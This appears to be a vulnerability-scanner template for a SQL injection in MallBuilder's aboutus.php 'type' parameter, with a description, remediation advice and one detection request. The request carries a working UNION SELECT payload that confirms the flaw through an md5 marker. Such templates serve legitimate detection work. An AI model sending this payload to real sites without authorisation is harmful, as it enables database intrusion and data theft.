id: Mallbuilder-aboutus_type-SQLi
info:
  name: Mallbuilder mall system aboutus.php parameter type injection vulnerability
  author:
  - l0ne1y
  description: |-
    Mallbuilder aboutus.php has an SQL injection vulnerability in the type parameter
    MallBuilder is a multi-user online mall solution based on PHP+MYSQL. Using MallBuilder, one can quickly build a powerful online mall similar to JD, Tmall, or Yihaodian, or an enterprise, industry, localized, and vertical multi-user mall.

    MallBuilder aboutus.php has an SQL injection vulnerability in the type parameter. An attacker can exploit it with specially crafted SQL statements to view, add, modify, or delete information in the database.
  severity: high
  remediation: |-
    Official Fix:
    1. It is recommended that users obtain the latest patch or the latest version from the official site:
    http://www.mall-builder.com/

    Temporary Fix:
    1. Use prepared statements. When using PDO, be careful not to concatenate variables directly into PDO statements. All queries should use the parameterized query interface provided by the database; parameterized statements use parameters instead of embedding user-input variables into SQL statements. Virtually all database systems provide a parameterized SQL execution interface, which can very effectively prevent SQL injection attacks.
    2. Escape special characters (such as '"<>&*;) entering the database, or perform encoding conversion.
    3. Validate the type of each piece of data; for example, numeric data must be numeric and the corresponding database field must be of type int.
    4. Strictly enforce data length limits, which to some degree prevents long SQL injection statements from executing correctly.
    5. Use consistent encoding across every data layer of the website; UTF-8 is recommended. Inconsistent encoding between layers may allow some filtering mechanisms to be bypassed.
    6. Strictly limit the database privileges of the website user, granting only the privileges needed to perform their work, thereby minimizing the damage injection attacks can cause to the database.
    7. Avoid displaying SQL error messages, such as type errors or field mismatches, to prevent attackers from using such error information for reconnaissance.
    8. Filter dangerous characters; for example, use regular expressions to match keywords such as union, sleep, and, select, and load_file, and stop execution if matched.
requests:
- matchers:
  - type: dsl
    dsl:
    - status_code==200 && contains(body,"202cb962ac59075b964b07152d234b7")
  matchers-condition: and
  path:
  - '{{BaseURL}}/aboutus.php?type=aa%27%20UNION%20SELECT%201%2C2%2Cmd5%28123%29%2C4%2C5%2C6%2C7%23'
  method: GET
